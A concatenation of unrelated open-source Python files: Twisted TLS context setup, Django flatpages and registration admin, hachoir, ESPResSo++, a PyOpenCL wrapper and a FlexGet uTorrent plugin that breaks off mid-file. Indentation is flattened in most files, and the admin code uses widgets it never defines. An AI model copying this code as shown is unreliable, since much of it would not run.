_OP_NO_COMPRESSION = getattr(SSL, 'OP_NO_COMPRESSION', 0x00020000)
    _OP_CIPHER_SERVER_PREFERENCE = getattr(SSL, 'OP_CIPHER_SERVER_PREFERENCE',
                                           0x00400000)
    _OP_SINGLE_ECDH_USE = getattr(SSL, 'OP_SINGLE_ECDH_USE', 0x00080000)
@_mutuallyExclusiveArguments([
['trustRoot', 'requireCertificate'],
['trustRoot', 'verify'],
['trustRoot', 'caCerts'],
])
def __init__(self,
privateKey=None,
certificate=None,
method=None,
verify=False,
caCerts=None,
verifyDepth=9,
requireCertificate=True,
verifyOnce=True,
enableSingleUseKeys=True,
enableSessions=True,
fixBrokenPeers=False,
enableSessionTickets=False,
extraCertChain=None,
acceptableCiphers=None,
dhParameters=None,
trustRoot=None):
"""
Create an OpenSSL context SSL connection context factory.
@param privateKey: A PKey object holding the private key.
@param certificate: An X509 object holding the certificate.
@param method: The SSL protocol to use, one of SSLv23_METHOD,
SSLv2_METHOD, SSLv3_METHOD, TLSv1_METHOD (or any other method
constants provided by pyOpenSSL). By default, a setting will be
used which allows TLSv1.0, TLSv1.1, and TLSv1.2.
@param verify: Please use a C{trustRoot} keyword argument instead,
since it provides the same functionality in a less error-prone way.
By default this is L{False}.
If L{True}, verify certificates received from the peer and fail the
handshake if verification fails. Otherwise, allow anonymous
sessions and sessions with certificates which fail validation.
@param caCerts: Please use a C{trustRoot} keyword argument instead,
since it provides the same functionality in a less error-prone way.
List of certificate authority certificate objects to use to verify
the peer's certificate. Only used if verify is L{True} and will be
ignored otherwise. Since verify is L{False} by default, this is
C{None} by default.
@type caCerts: C{list} of L{OpenSSL.crypto.X509}
@param verifyDepth: Depth in certificate chain down to which to verify.
If unspecified, use the underlying default (9).
@param requireCertificate: Please use a C{trustRoot} keyword argument
instead, since it provides the same functionality in a less
error-prone way.
If L{True}, do not allow anonymous sessions; defaults to L{True}.
@param verifyOnce: If True, do not re-verify the certificate on session
resumption.
@param enableSingleUseKeys: If L{True}, generate a new key whenever
ephemeral DH and ECDH parameters are used to prevent small subgroup
attacks and to ensure perfect forward secrecy.
@param enableSessions: If True, set a session ID on each context. This
allows a shortened handshake to be used when a known client
reconnects.
@param fixBrokenPeers: If True, enable various non-spec protocol fixes
for broken SSL implementations. This should be entirely safe,
according to the OpenSSL documentation, but YMMV. This option is
now off by default, because it causes problems with connections
between peers using OpenSSL 0.9.8a.
@param enableSessionTickets: If L{True}, enable session ticket
extension for session resumption per RFC 5077. Note there is no
support for controlling session tickets. This option is off by
default, as some server implementations don't correctly process
incoming empty session ticket extensions in the hello.
@param extraCertChain: List of certificates that I{complete} your
verification chain if the certificate authority that signed your
C{certificate} isn't widely supported. Do I{not} add
C{certificate} to it.
@type extraCertChain: C{list} of L{OpenSSL.crypto.X509}
@param acceptableCiphers: Ciphers that are acceptable for connections.
Uses a secure default if left L{None}.
@type acceptableCiphers: L{IAcceptableCiphers}
@param dhParameters: Key generation parameters that are required for
Diffie-Hellman key exchange. If this argument is left L{None},
C{EDH} ciphers are I{disabled} regardless of C{acceptableCiphers}.
@type dhParameters: L{DiffieHellmanParameters
<twisted.internet.ssl.DiffieHellmanParameters>}
@param trustRoot: Specification of trust requirements of peers. If
this argument is specified, the peer is verified. It requires a
certificate, and that certificate must be signed by one of the
certificate authorities specified by this object.
Note that since this option specifies the same information as
C{caCerts}, C{verify}, and C{requireCertificate}, specifying any of
those options in combination with this one will raise a
L{TypeError}.
@type trustRoot: L{IOpenSSLTrustRoot}
@raise ValueError: when C{privateKey} or C{certificate} are set without
setting the respective other.
@raise ValueError: when C{verify} is L{True} but C{caCerts} doesn't
specify any CA certificates.
@raise ValueError: when C{extraCertChain} is passed without specifying
C{privateKey} or C{certificate}.
@raise ValueError: when C{acceptableCiphers} doesn't yield any usable
ciphers for the current platform.
@raise TypeError: if C{trustRoot} is passed in combination with
C{caCert}, C{verify}, or C{requireCertificate}. Please prefer
C{trustRoot} in new code, as its semantics are less tricky.
"""
if (privateKey is None) != (certificate is None):
raise ValueError(
"Specify neither or both of privateKey and certificate")
self.privateKey = privateKey
self.certificate = certificate
# Set basic security options: disallow insecure SSLv2, disallow TLS
# compression to avoid CRIME attack, make the server choose the
# ciphers.
self._options = (
SSL.OP_NO_SSLv2 | self._OP_NO_COMPRESSION |
self._OP_CIPHER_SERVER_PREFERENCE
)
if method is None:
# If no method is specified set things up so that TLSv1.0 and newer
# will be supported.
self.method = SSL.SSLv23_METHOD
self._options |= SSL.OP_NO_SSLv3
else:
# Otherwise respect the application decision.
self.method = method
if verify and not caCerts:
raise ValueError("Specify client CA certificate information if and"
" only if enabling certificate verification")
self.verify = verify
if extraCertChain is not None and None in (privateKey, certificate):
raise ValueError("A private key and a certificate are required "
"when adding a supplemental certificate chain.")
if extraCertChain is not None:
self.extraCertChain = extraCertChain
else:
self.extraCertChain = []
self.caCerts = caCerts
self.verifyDepth = verifyDepth
self.requireCertificate = requireCertificate
self.verifyOnce = verifyOnce
self.enableSingleUseKeys = enableSingleUseKeys
if enableSingleUseKeys:
self._options |= SSL.OP_SINGLE_DH_USE | self._OP_SINGLE_ECDH_USE
self.enableSessions = enableSessions
self.fixBrokenPeers = fixBrokenPeers
if fixBrokenPeers:
self._options |= self._OP_ALL
self.enableSessionTickets = enableSessionTickets
if not enableSessionTickets:
self._options |= self._OP_NO_TICKET
self.dhParameters = dhParameters
try:
self._ecCurve = _OpenSSLECCurve(_defaultCurveName)
except NotImplementedError:
self._ecCurve = None
if acceptableCiphers is None:
acceptableCiphers = defaultCiphers
# This needs to run when method and _options are finalized.
self._cipherString = u':'.join(
c.fullName
for c in acceptableCiphers.selectCiphers(
_expandCipherString(u'ALL', self.method, self._options)
)
)
if self._cipherString == u'':
raise ValueError(
'Supplied IAcceptableCiphers yielded no usable ciphers '
'on this platform.'
)
if trustRoot is None:
if self.verify:
trustRoot = OpenSSLCertificateAuthorities(caCerts)
else:
self.verify = True
self.requireCertificate = True
trustRoot = IOpenSSLTrustRoot(trustRoot)
self.trustRoot = trustRoot
def __getstate__(self):
d = self.__dict__.copy()
try:
del d['_context']
except KeyError:
pass
return d
def __setstate__(self, state):
self.__dict__ = state
def getContext(self):
"""
Return an L{OpenSSL.SSL.Context} object.
"""
if self._context is None:
self._context = self._makeContext()
return self._context
def _makeContext(self):
ctx = self._contextFactory(self.method)
ctx.set_options(self._options)
if self.certificate is not None and self.privateKey is not None:
ctx.use_certificate(self.certificate)
ctx.use_privatekey(self.privateKey)
for extraCert in self.extraCertChain:
ctx.add_extra_chain_cert(extraCert)
# Sanity check
ctx.check_privatekey()
verifyFlags = SSL.VERIFY_NONE
if self.verify:
verifyFlags = SSL.VERIFY_PEER
if self.requireCertificate:
verifyFlags |= SSL.VERIFY_FAIL_IF_NO_PEER_CERT
if self.verifyOnce:
verifyFlags |= SSL.VERIFY_CLIENT_ONCE
self.trustRoot._addCACertsToContext(ctx)
# It'd be nice if pyOpenSSL let us pass None here for this behavior (as
# the underlying OpenSSL API call allows NULL to be passed). It
# doesn't, so we'll supply a function which does the same thing.
def _verifyCallback(conn, cert, errno, depth, preverify_ok):
return preverify_ok
ctx.set_verify(verifyFlags, _verifyCallback)
if self.verifyDepth is not None:
ctx.set_verify_depth(self.verifyDepth)
if self.enableSessions:
name = "%s-%d" % (reflect.qual(self.__class__), _sessionCounter())
sessionName = md5(networkString(name)).hexdigest()
ctx.set_session_id(sessionName)
if self.dhParameters:
ctx.load_tmp_dh(self.dhParameters._dhFile.path)
ctx.set_cipher_list(nativeString(self._cipherString))
if self._ecCurve is not None:
try:
self._ecCurve.addECKeyToContext(ctx)
except BaseException:
pass # ECDHE support is best effort only.
return ctx
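# Illustrative sketch (not part of the upstream module): a typical server-side
# configuration built from a PEM file holding both the private key and the
# certificate.  The file name is a placeholder.
def _exampleServerCertificateOptions():
    from twisted.internet import ssl
    with open("server.pem") as pemFile:
        pemData = pemFile.read()
    # PrivateCertificate.options() returns a CertificateOptions instance wired
    # up with this key/certificate pair and this module's secure defaults.
    return ssl.PrivateCertificate.loadPEM(pemData).options()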
class _OpenSSLECCurve(FancyEqMixin, object):
"""
A private representation of an OpenSSL ECC curve.
"""
compareAttributes = ("snName", )
def __init__(self, snName):
"""
@param snName: The name of the curve as used by C{OBJ_sn2nid}.
        @type snName: L{unicode}
@raises NotImplementedError: If ECC support is not available.
@raises ValueError: If C{snName} is not a supported curve.
"""
self.snName = nativeString(snName)
# As soon as pyOpenSSL supports ECDHE directly, attempt to use its
# APIs first. See #7033.
# If pyOpenSSL is based on cryptography.io (0.14+), we use its
# bindings directly to set the ECDHE curve.
try:
binding = self._getBinding()
self._lib = binding.lib
self._ffi = binding.ffi
self._nid = self._lib.OBJ_sn2nid(self.snName.encode('ascii'))
if self._nid == self._lib.NID_undef:
raise ValueError("Unknown ECC curve.")
except AttributeError:
raise NotImplementedError(
"This version of pyOpenSSL does not support ECC."
)
def _getBinding(self):
"""
Attempt to get cryptography's binding instance.
@raises NotImplementedError: If underlying pyOpenSSL is not based on
cryptography.
        @return: cryptography bindings.
@rtype: C{cryptography.hazmat.bindings.openssl.Binding}
"""
try:
from OpenSSL._util import binding
return binding
except ImportError:
raise NotImplementedError(
"This version of pyOpenSSL does not support ECC."
)
def addECKeyToContext(self, context):
"""
        Add a temporary EC key to C{context}.
@param context: The context to add a key to.
@type context: L{OpenSSL.SSL.Context}
"""
ecKey = self._lib.EC_KEY_new_by_curve_name(self._nid)
if ecKey == self._ffi.NULL:
raise EnvironmentError("EC key creation failed.")
self._lib.SSL_CTX_set_tmp_ecdh(context._context, ecKey)
self._lib.EC_KEY_free(ecKey)
@implementer(ICipher)
class OpenSSLCipher(FancyEqMixin, object):
"""
A representation of an OpenSSL cipher.
"""
compareAttributes = ('fullName',)
def __init__(self, fullName):
"""
@param fullName: The full name of the cipher. For example
C{u"ECDHE-RSA-AES256-GCM-SHA384"}.
@type fullName: L{unicode}
"""
self.fullName = fullName
def __repr__(self):
"""
A runnable representation of the cipher.
"""
return 'OpenSSLCipher({0!r})'.format(self.fullName)
def _expandCipherString(cipherString, method, options):
"""
Expand C{cipherString} according to C{method} and C{options} to a list
of explicit ciphers that are supported by the current platform.
@param cipherString: An OpenSSL cipher string to expand.
@type cipherString: L{unicode}
@param method: An OpenSSL method like C{SSL.TLSv1_METHOD} used for
determining the effective ciphers.
@param options: OpenSSL options like C{SSL.OP_NO_SSLv3} ORed together.
@type options: L{int}
@return: The effective list of explicit ciphers that results from the
arguments on the current platform.
@rtype: L{list} of L{ICipher}
"""
ctx = SSL.Context(method)
ctx.set_options(options)
try:
ctx.set_cipher_list(nativeString(cipherString))
except SSL.Error as e:
if e.args[0][0][2] == 'no cipher match':
return []
else:
raise
conn = SSL.Connection(ctx, None)
ciphers = conn.get_cipher_list()
if isinstance(ciphers[0], unicode):
return [OpenSSLCipher(cipher) for cipher in ciphers]
else:
return [OpenSSLCipher(cipher.decode('ascii')) for cipher in ciphers]
@implementer(IAcceptableCiphers)
class OpenSSLAcceptableCiphers(object):
"""
A representation of ciphers that are acceptable for TLS connections.
"""
def __init__(self, ciphers):
self._ciphers = ciphers
def selectCiphers(self, availableCiphers):
return [cipher
for cipher in self._ciphers
if cipher in availableCiphers]
@classmethod
def fromOpenSSLCipherString(cls, cipherString):
"""
Create a new instance using an OpenSSL cipher string.
@param cipherString: An OpenSSL cipher string that describes what
cipher suites are acceptable.
See the documentation of U{OpenSSL
<http://www.openssl.org/docs/apps/ciphers.html#CIPHER_STRINGS>} or
U{Apache
<http://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslciphersuite>}
for details.
@type cipherString: L{unicode}
@return: Instance representing C{cipherString}.
@rtype: L{twisted.internet.ssl.AcceptableCiphers}
"""
return cls(_expandCipherString(
nativeString(cipherString),
SSL.SSLv23_METHOD, SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3)
)
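# Illustrative sketch (not part of the upstream module): restricting a
# connection to an explicit cipher string instead of the secure default below.
# The cipher names are placeholders for whatever policy an application needs.
def _exampleExplicitCiphers():
    ciphers = OpenSSLAcceptableCiphers.fromOpenSSLCipherString(
        u"ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384"
    )
    return OpenSSLCertificateOptions(acceptableCiphers=ciphers)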
# A secure default.
# Sources for more information on TLS ciphers:
#
# - https://wiki.mozilla.org/Security/Server_Side_TLS
# - https://www.ssllabs.com/projects/best-practices/index.html
# - https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
#
# The general intent is:
# - Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE),
# - prefer ECDHE over DHE for better performance,
# - prefer any AES-GCM over any AES-CBC for better performance and security,
# - use 3DES as fallback which is secure but slow,
# - disable NULL authentication, MD5 MACs and DSS for security reasons.
#
defaultCiphers = OpenSSLAcceptableCiphers.fromOpenSSLCipherString(
"ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:"
"DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS"
)
_defaultCurveName = u"prime256v1"
class OpenSSLDiffieHellmanParameters(object):
"""
A representation of key generation parameters that are required for
Diffie-Hellman key exchange.
"""
def __init__(self, parameters):
self._dhFile = parameters
@classmethod
def fromFile(cls, filePath):
"""
Load parameters from a file.
Such a file can be generated using the C{openssl} command line tool as
        follows:
C{openssl dhparam -out dh_param_1024.pem -2 1024}
Please refer to U{OpenSSL's C{dhparam} documentation
<http://www.openssl.org/docs/apps/dhparam.html>} for further details.
@param filePath: A file containing parameters for Diffie-Hellman key
exchange.
@type filePath: L{FilePath <twisted.python.filepath.FilePath>}
        @return: An instance that loads its parameters from C{filePath}.
@rtype: L{DiffieHellmanParameters
<twisted.internet.ssl.DiffieHellmanParameters>}
"""
return cls(filePath)
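# Illustrative sketch (not part of the upstream module): feeding parameters
# generated with the "openssl dhparam" command documented above into
# CertificateOptions.  The file name is a placeholder.
def _exampleDiffieHellmanUsage():
    from twisted.python.filepath import FilePath
    dhParams = OpenSSLDiffieHellmanParameters.fromFile(
        FilePath(b"dh_param_1024.pem"))
    return OpenSSLCertificateOptions(dhParameters=dhParams)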
| bsd-3-clause |
nathanaevitas/odoo | openerp/addons/event/wizard/__init__.py | 435 | 1067 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import event_confirm
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
govarguz/espressopp | src/main/_setup.py | 9 | 4037 | # Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# now load the fundamental modules
# load mpi4py (must be loaded before _espressopp)
import mpi4py.MPI as MPI
# load the ES++-C++ module
import _espressopp
# load PMI explicitly from espressopp
from espressopp import pmi
# define pmiimport
if pmi.isController :
def pmiimport(module):
pmi.exec_('import ' + module)
else:
def pmiimport(module):
pass
# set up logging
def _setupLogging():
import logging, os, math
logConfigFile="espressopp_log.conf"
if os.path.exists(logConfigFile) :
import logging.config
logging.config.fileConfig(logConfigFile)
log = logging.getLogger('root')
log.info('Reading log config file %s', logConfigFile)
else :
logging.basicConfig(
format = "%(process)d %(asctime)s %(name)s (%(filename)s::%(lineno)s,%(funcName)s) %(levelname)s: %(message)s")
log = logging.getLogger('root')
log.info('Did not find log config file %s, using basic configuration.', logConfigFile)
# This initialization routine will change existing and future loggers
# to make a connection with their Python logger and change their class
def __my_setLevel(self, level):
__orig_setLevel(self, level)
_espressopp.setLogger(self)
__orig_setLevel = logging.Logger.setLevel
logging.Logger.setLevel = __my_setLevel
logging.TRACE = int((logging.NOTSET + logging.DEBUG)/2.0)
logging.addLevelName('TRACE', logging.TRACE)
_espressopp.setLogger()
# execute the function
_setupLogging()
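# Illustrative sketch (not part of the original module): a minimal
# espressopp_log.conf that the fileConfig() branch above would accept.  The
# handler, formatter and format string are placeholders, not project defaults.
#
#     [loggers]
#     keys=root
#
#     [handlers]
#     keys=console
#
#     [formatters]
#     keys=plain
#
#     [logger_root]
#     level=INFO
#     handlers=console
#
#     [handler_console]
#     class=StreamHandler
#     level=INFO
#     formatter=plain
#     args=(sys.stderr,)
#
#     [formatter_plain]
#     format=%(asctime)s %(name)s %(levelname)s: %(message)s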
def _setupProperty():
import __builtin__
# Make the property setter decorator syntax of python 2.6+ available
# to earlier versions
try :
__setter = __builtin__.property.setter
except AttributeError :
import __builtin__, sys
# save the property builtin
_property = __builtin__.property
# now define our property
# stolen from http://bruynooghe.blogspot.com/2008/04/xsetter-syntax-in-python-25.html
class property(_property):
def __init__(self, fget, *args, **kwargs):
self.__doc__ = fget.__doc__
super(property, self).__init__(fget, *args, **kwargs)
def setter(self, fset):
cls_ns = sys._getframe(1).f_locals
for k, v in cls_ns.iteritems():
if v == self:
propname = k
break
cls_ns[propname] = _property(self.fget, fset,
self.fdel, self.__doc__)
return cls_ns[propname]
def deleter(self, fdel):
cls_ns = sys._getframe(1).f_locals
for k, v in cls_ns.iteritems():
if v == self:
propname = k
break
cls_ns[propname] = _property(self.fget, self.fset,
fdel, self.__doc__)
return cls_ns[propname]
# Now override the property builtin
__builtin__.property = property
_setupProperty()
| gpl-3.0 |
hosseinsadeghi/ultracold-ions | uci/AngularDampingAdvance.py | 2 | 3099 | # vi: ts=4 sw=4
import math
import numpy
import pyopencl.array as cl_array
import pyopencl as cl
import sys
import os
class AngularDampingAdvance():
def __init__(self, ctx = None, queue = None):
self.minRadius = 1.0e-5
self.ctx = ctx
self.queue = queue
if self.ctx == None:
self.ctx = cl.create_some_context()
if self.queue == None:
self.queue = cl.CommandQueue(self.ctx,
properties = cl.command_queue_properties.PROFILING_ENABLE)
absolutePathToKernels = os.path.dirname(
os.path.realpath(__file__))
src = open(absolutePathToKernels + '/angular_damping_advance.cl',
'r').read()
self.angularDampingAdvF = cl.Program(self.ctx, src)
try:
self.angularDampingAdvF.build()
except:
print("Error:")
print(self.angularDampingAdvF.get_build_info(
self.ctx.devices[0],
cl.program_build_info.LOG))
raise
self.angularDampingAdvF.advance_ptcls_angular_damping.set_scalar_arg_dtypes(
[None, None, None, None, None, None, None, None,
numpy.float32, numpy.float32, numpy.float32,
numpy.int32])
self.angularDampingAdvD = cl.Program(self.ctx, src)
try:
self.angularDampingAdvD.build()
except:
print("Error:")
print(self.angularDampingAdvD.get_build_info(
self.ctx.devices[0],
cl.program_build_info.LOG))
raise
self.angularDampingAdvD.advance_ptcls_angular_damping.set_scalar_arg_dtypes(
[None, None, None, None, None, None, None, None,
numpy.float64, numpy.float64, numpy.float64,
numpy.int32])
def advancePtcls(self, xd, yd, zd, vxd, vyd, vzd, qd, md,
dampingCoefficient, omega, dt):
"""
Dampen velocities in the x-y plane.
"""
prec = xd.dtype
if prec == numpy.float32:
            self.angularDampingAdvF.advance_ptcls_angular_damping(self.queue,
(xd.size, ), None,
xd.data, yd.data, zd.data,
vxd.data, vyd.data, vzd.data,
qd.data, md.data,
numpy.float32(math.exp(-dampingCoefficient * dt)),
numpy.float32(omega),
numpy.float32(self.minRadius),
numpy.int32(xd.size),
g_times_l = False)
elif prec == numpy.float64:
self.angularDampingAdvD.advance_ptcls_angular_damping(self.queue,
(xd.size, ), None,
xd.data, yd.data, zd.data,
vxd.data, vyd.data, vzd.data,
qd.data, md.data,
numpy.float64(math.exp(-dampingCoefficient * dt)),
numpy.float64(omega),
numpy.float64(self.minRadius),
numpy.int32(xd.size),
g_times_l = False)
else:
print("Unknown float type.")
| mit |
chriscauley/django-registration | registration/admin.py | 1 | 1630 | from django.contrib import admin, messages
from django.contrib.sites.requests import RequestSite
from django.contrib.sites.models import Site
from django.utils.translation import ugettext_lazy as _
from registration.models import RegistrationProfile
class RawMixin(object):
def formfield_for_dbfield(self, db_field, **kwargs):
if db_field.name in self.raw_id_fields:
kwargs.pop("request", None)
            rel_type = db_field.rel.__class__.__name__
            # VerboseForeignKeyRawIdWidget / VerboseManyToManyRawIdWidget are
            # expected to be provided elsewhere in the project; they are not
            # defined or imported in this module.
            if rel_type == "ManyToOneRel":
                kwargs['widget'] = VerboseForeignKeyRawIdWidget(db_field.rel, admin.site)
            elif rel_type == "ManyToManyRel":
                kwargs['widget'] = VerboseManyToManyRawIdWidget(db_field.rel, admin.site)
return db_field.formfield(**kwargs)
return super(RawMixin, self).formfield_for_dbfield(db_field, **kwargs)
class RegistrationAdmin(RawMixin,admin.ModelAdmin):
actions = ['activate_users', 'resend_activation_email']
list_display = ('user', 'expired')
raw_id_fields = ['user']
search_fields = ('user__username', 'user__first_name', 'user__last_name')
def activate_users(self, request, queryset):
for profile in queryset:
RegistrationProfile.objects.activate_user(profile.activation_key)
activate_users.short_description = _("Activate users")
def resend_activation_email(self, request, queryset):
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
for profile in queryset:
profile.send_activation_email(site)
resend_activation_email.short_description = _("Re-send activation emails")
admin.site.register(RegistrationProfile, RegistrationAdmin)
| bsd-3-clause |
joakim-hove/django | django/contrib/flatpages/views.py | 475 | 2777 | from django.conf import settings
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.shortcuts import get_current_site
from django.http import Http404, HttpResponse, HttpResponsePermanentRedirect
from django.shortcuts import get_object_or_404
from django.template import loader
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
DEFAULT_TEMPLATE = 'flatpages/default.html'
# This view is called from FlatpageFallbackMiddleware.process_response
# when a 404 is raised, which often means CsrfViewMiddleware.process_view
# has not been called even if CsrfViewMiddleware is installed. So we need
# to use @csrf_protect, in case the template needs {% csrf_token %}.
# However, we can't just wrap this view; if no matching flatpage exists,
# or a redirect is required for authentication, the 404 needs to be returned
# without any CSRF checks. Therefore, we only
# CSRF protect the internal implementation.
def flatpage(request, url):
"""
Public interface to the flat page view.
Models: `flatpages.flatpages`
Templates: Uses the template defined by the ``template_name`` field,
or :template:`flatpages/default.html` if template_name is not defined.
Context:
flatpage
`flatpages.flatpages` object
"""
if not url.startswith('/'):
url = '/' + url
site_id = get_current_site(request).id
try:
f = get_object_or_404(FlatPage,
url=url, sites=site_id)
except Http404:
if not url.endswith('/') and settings.APPEND_SLASH:
url += '/'
f = get_object_or_404(FlatPage,
url=url, sites=site_id)
return HttpResponsePermanentRedirect('%s/' % request.path)
else:
raise
return render_flatpage(request, f)
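# Illustrative sketch (not part of this module): wiring the view above into a
# URLconf directly, as an alternative to the flatpage fallback middleware.
# The URL prefix is a placeholder.
#
#     from django.conf.urls import url
#     from django.contrib.flatpages import views
#
#     urlpatterns = [
#         url(r'^pages/(?P<url>.*)$', views.flatpage),
#     ]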
@csrf_protect
def render_flatpage(request, f):
"""
Internal interface to the flat page view.
"""
# If registration is required for accessing this page, and the user isn't
# logged in, redirect to the login page.
if f.registration_required and not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.path)
if f.template_name:
template = loader.select_template((f.template_name, DEFAULT_TEMPLATE))
else:
template = loader.get_template(DEFAULT_TEMPLATE)
# To avoid having to always use the "|safe" filter in flatpage templates,
# mark the title and content as already safe (since they are raw HTML
# content in the first place).
f.title = mark_safe(f.title)
f.content = mark_safe(f.content)
response = HttpResponse(template.render({'flatpage': f}, request))
return response
| bsd-3-clause |
SerialShadow/SickRage | lib/hachoir_core/field/basic_field_set.py | 74 | 4776 | from hachoir_core.field import Field, FieldError
from hachoir_core.stream import InputStream
from hachoir_core.endian import BIG_ENDIAN, LITTLE_ENDIAN, MIDDLE_ENDIAN
from hachoir_core.event_handler import EventHandler
class ParserError(FieldError):
"""
Error raised by a field set.
@see: L{FieldError}
"""
pass
class MatchError(FieldError):
"""
Error raised by a field set when the stream content doesn't
    match the file format.
@see: L{FieldError}
"""
pass
class BasicFieldSet(Field):
_event_handler = None
is_field_set = True
endian = None
def __init__(self, parent, name, stream, description, size):
# Sanity checks (preconditions)
assert not parent or issubclass(parent.__class__, BasicFieldSet)
assert issubclass(stream.__class__, InputStream)
# Set field set size
if size is None and self.static_size:
assert isinstance(self.static_size, (int, long))
size = self.static_size
# Set Field attributes
self._parent = parent
self._name = name
self._size = size
self._description = description
self.stream = stream
self._field_array_count = {}
# Set endian
if not self.endian:
assert parent and parent.endian
self.endian = parent.endian
if parent:
# This field set is one of the root leafs
self._address = parent.nextFieldAddress()
self.root = parent.root
assert id(self.stream) == id(parent.stream)
else:
# This field set is the root
self._address = 0
self.root = self
self._global_event_handler = None
# Sanity checks (post-conditions)
assert self.endian in (BIG_ENDIAN, LITTLE_ENDIAN, MIDDLE_ENDIAN)
if (self._size is not None) and (self._size <= 0):
raise ParserError("Invalid parser '%s' size: %s" % (self.path, self._size))
def reset(self):
self._field_array_count = {}
def createValue(self):
return None
def connectEvent(self, event_name, handler, local=True):
assert event_name in (
# Callback prototype: def f(field)
# Called when new value is already set
"field-value-changed",
# Callback prototype: def f(field)
# Called when field size is already set
"field-resized",
# A new field has been inserted in the field set
# Callback prototype: def f(index, new_field)
"field-inserted",
# Callback prototype: def f(old_field, new_field)
# Called when new field is already in field set
"field-replaced",
# Callback prototype: def f(field, new_value)
# Called to ask to set new value
"set-field-value"
), "Event name %r is invalid" % event_name
if local:
if self._event_handler is None:
self._event_handler = EventHandler()
self._event_handler.connect(event_name, handler)
else:
if self.root._global_event_handler is None:
self.root._global_event_handler = EventHandler()
self.root._global_event_handler.connect(event_name, handler)
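    # Illustrative sketch (not part of the original class): a caller holding a
    # parser instance (any BasicFieldSet subclass, here called "parser") might
    # register a local listener like this.
    #
    #     def onValueChanged(field):
    #         print("%s changed to %r" % (field.path, field.value))
    #
    #     parser.connectEvent("field-value-changed", onValueChanged)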
def raiseEvent(self, event_name, *args):
# Transfer event to local listeners
if self._event_handler is not None:
self._event_handler.raiseEvent(event_name, *args)
# Transfer event to global listeners
if self.root._global_event_handler is not None:
self.root._global_event_handler.raiseEvent(event_name, *args)
def setUniqueFieldName(self, field):
key = field._name[:-2]
try:
self._field_array_count[key] += 1
except KeyError:
self._field_array_count[key] = 0
field._name = key + "[%u]" % self._field_array_count[key]
def readFirstFields(self, number):
"""
        Read the first C{number} fields if they are not read yet.
        Returns the number of newly added fields.
"""
number = number - self.current_length
if 0 < number:
return self.readMoreFields(number)
else:
return 0
def createFields(self):
raise NotImplementedError()
def __iter__(self):
raise NotImplementedError()
def __len__(self):
raise NotImplementedError()
def getField(self, key, const=True):
raise NotImplementedError()
def nextFieldAddress(self):
raise NotImplementedError()
def getFieldIndex(self, field):
raise NotImplementedError()
def readMoreFields(self, number):
raise NotImplementedError()
| gpl-3.0 |
X-dark/Flexget | flexget/plugins/output/utorrent.py | 7 | 3914 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, absolute_import
import os
from logging import getLogger
from flexget import plugin
from flexget.event import event
from flexget.utils import requests
from flexget.utils.soup import get_soup
from flexget.utils.template import RenderError
log = getLogger('utorrent')
class PluginUtorrent(object):
"""
    Parse task content or url for hoster links and add them to uTorrent.
Example::
utorrent:
url: http://localhost:8080/gui/
username: my_username
password: my_password
path: Series
"""
__author__ = 'Nil'
__version__ = '0.1'
schema = {
'type': 'object',
'properties': {
'url': {'type': 'string', 'format': 'url'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'path': {'type': 'string'}
},
'required': ['username', 'password', 'url'],
'additionalProperties': False
}
@plugin.internet(log)
def on_task_output(self, task, config):
if not config.get('enabled', True):
return
if not task.accepted:
return
session = requests.Session()
url = config['url']
if not url.endswith('/'):
url += '/'
auth = (config['username'], config['password'])
# Login
try:
response = session.get(url + 'token.html', auth=auth)
except requests.RequestException as e:
            if hasattr(e, 'response') and e.response.status_code == 401:
raise plugin.PluginError('Invalid credentials, check your utorrent webui username and password.', log)
raise plugin.PluginError('%s' % e, log)
token = get_soup(response.text).find('div', id='token').text
result = session.get(url, auth=auth, params={'action': 'list-dirs', 'token': token}).json()
download_dirs = dict((os.path.normcase(dir['path']), i) for i, dir in enumerate(result['download-dirs']))
for entry in task.accepted:
# http://[IP]:[PORT]/gui/?action=add-url&s=[TORRENT URL]
# bunch of urls now going to check
folder = 0
path = entry.get('path', config.get('path', ''))
try:
path = os.path.normcase(os.path.expanduser(entry.render(path)))
except RenderError as e:
log.error('Could not render path for `%s` downloading to default directory.' % entry['title'])
# Add to default folder
path = ''
if path:
for dir in download_dirs:
if path.startswith(dir):
folder = download_dirs[dir]
path = path[len(dir):].lstrip('\\')
break
else:
                    log.error('path `%s` (or one of its parents) is not added to utorrent webui allowed download '
'directories. You must add it there before you can use it from flexget. '
'Adding to default download directory instead.' % path)
